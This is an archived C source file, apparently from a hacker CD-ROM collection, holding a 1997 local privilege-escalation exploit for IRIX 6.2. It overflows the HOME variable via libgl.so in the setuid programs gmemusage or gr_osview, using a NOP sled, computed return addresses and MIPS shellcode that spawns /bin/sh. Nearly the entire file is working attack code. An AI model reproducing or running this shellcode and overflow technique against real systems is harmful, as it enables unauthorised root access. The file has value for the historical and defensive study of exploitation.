home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / irix / irx_libgl.c < prev    next >
Encoding:
C/C++ Source or Header  |  2002-10-22  |  2.2 KB  |  71 lines

  1. /*## copyright LAST STAGE OF DELIRIUM sep 1997 poland        *://lsd-pl.net/ #*/
  2. /*## libgl.so $HOME                                                          #*/
  3.  
  4. #define ADRNUM 500
  5. #define PCHNUM 320
  6. #define TMPNUM 500
  7. #define NOPNUM 740
  8. #define ALLIGN 3
  9.  
  10. char shellcode[]=
  11.     "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
  12.     "\x24\x02\x03\xf3"    /* li      $v0,1011             */
  13.     "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
  14.     "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
  15.     "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
  16.     "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
  17.     "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
  18.     "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
  19.     "\x03\xff\xff\xcc"    /* syscall                      */
  20.     "/bin/sh"
  21. ;
  22.  
  23. char jump[]=
  24.     "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
  25.     "\x03\xe0\x00\x08"    /* jr      $ra                  */
  26. ;
  27.  
  28. char nop[]="\x24\x0f\x12\x34";
  29.  
  30. main(int argc,char **argv){
  31.     char buffer[10000],adr[4],pch[4],tmp[4],*b,*envp[2];
  32.     int i,n=-1;
  33.  
  34.     printf("copyright LAST STAGE OF DELIRIUM sep 1997 poland  //lsd-pl.net/\n");
  35.     printf("libgl.so $HOME for irix 6.2 IP:20,22\n\n");
  36.  
  37.     if(argc!=2){
  38.         printf("usage: %s {gmemusage|gr_osview}\n",argv[0]);
  39.         exit(-1);
  40.     }
  41.     if(!strcmp(argv[1],"gmemusage")) n=0;
  42.     if(!strcmp(argv[1],"gr_osview")) n=1;
  43.     if(n==-1) exit(-1);
  44.  
  45.     *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10268+252+824+500;
  46.     *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10268+252+824+31868;
  47.     *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10268;
  48.  
  49.     envp[0]=buffer;
  50.     envp[1]=0;
  51.  
  52.     b=buffer;
  53.     sprintf(b,"HOME=");
  54.     b+=5;
  55.     for(i=0;i<ALLIGN;i++) *b++=0xff;
  56.     for(i=0;i<TMPNUM;i++) *b++=tmp[i%4];
  57.     *b++=0xff;
  58.     for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
  59.     for(i=0;i<ALLIGN;i++) *b++=0xff;
  60.     for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
  61.     for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
  62.     for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; 
  63.     *b=0;
  64.  
  65.     switch(n){
  66.     case 0: execle("/usr/sbin/gmemusage","lsd",0,envp);
  67.     case 1: execle("/usr/sbin/gr_osview","lsd",0,envp);
  68.     }
  69. }
  70.  
  71.